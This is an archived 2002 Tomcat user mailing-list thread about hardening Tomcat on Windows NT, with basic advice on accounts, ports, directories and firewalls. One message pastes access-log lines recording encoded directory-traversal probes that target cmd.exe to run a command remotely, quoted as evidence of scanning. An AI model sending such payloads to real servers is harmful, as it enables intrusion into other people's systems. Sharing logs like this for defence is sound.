I posted a similar question a while ago and did not receive any answer from this list. May be, folks on this list are admins/ developers/programmers who are bothered mostly about application itself and not security. May be there is an "overall security" list where such questions may be posed. Anybody have suggestions where questions such as these may be directed?
On a different thread, some relevant info was posted... http://www.mail-archive.com/tomcat-user@jakarta.apache.org/msg60278.html It is probably a good idea to pay some attention to security. A snippet from my access_log (same IP - somebody is curious!) ---------------------------------------------- [23/Jul/2002:11:49:38 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648 [23/Jul/2002:11:49:38 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648 [23/Jul/2002:11:49:38 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718 [23/Jul/2002:11:49:39 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687 [23/Jul/2002:11:49:39 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687 [23/Jul/2002:11:49:39 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721 [23/Jul/2002:11:49:39 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715 [23/Jul/2002:11:55:24 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648 [23/Jul/2002:11:55:24 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 648 [23/Jul/2002:11:55:25 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 718 [23/Jul/2002:11:55:25 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687 [23/Jul/2002:11:55:25 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 687 [23/Jul/2002:11:55:25 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 721 [23/Jul/2002:11:55:25 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 715 ---------------------------------------------- "Sexton, George" wrote: > Think about the account you are running it under. > -----Original Message----- > From: Patel, Rajni M [mailto:[EMAIL PROTECTED]] > Sent: 23 July, 2002 12:17 PM > I have tomcat installed and running on a Windows NT 4.0 SP6a box and need to > harden the installation. > > The things that I have thought about and I can do is: > > 1) Change the HTTP port in server.xml file from default value of 8080. > 2) Remove the TOMCAT_HOME\examples directory > 3) Remove the weapp\admin directory > 4) Utilise a Firewall and restrict access to the NT box to IP Domain. -- To unsubscribe, e-mail: <mailto:[EMAIL PROTECTED]> For additional commands, e-mail: <mailto:[EMAIL PROTECTED]>
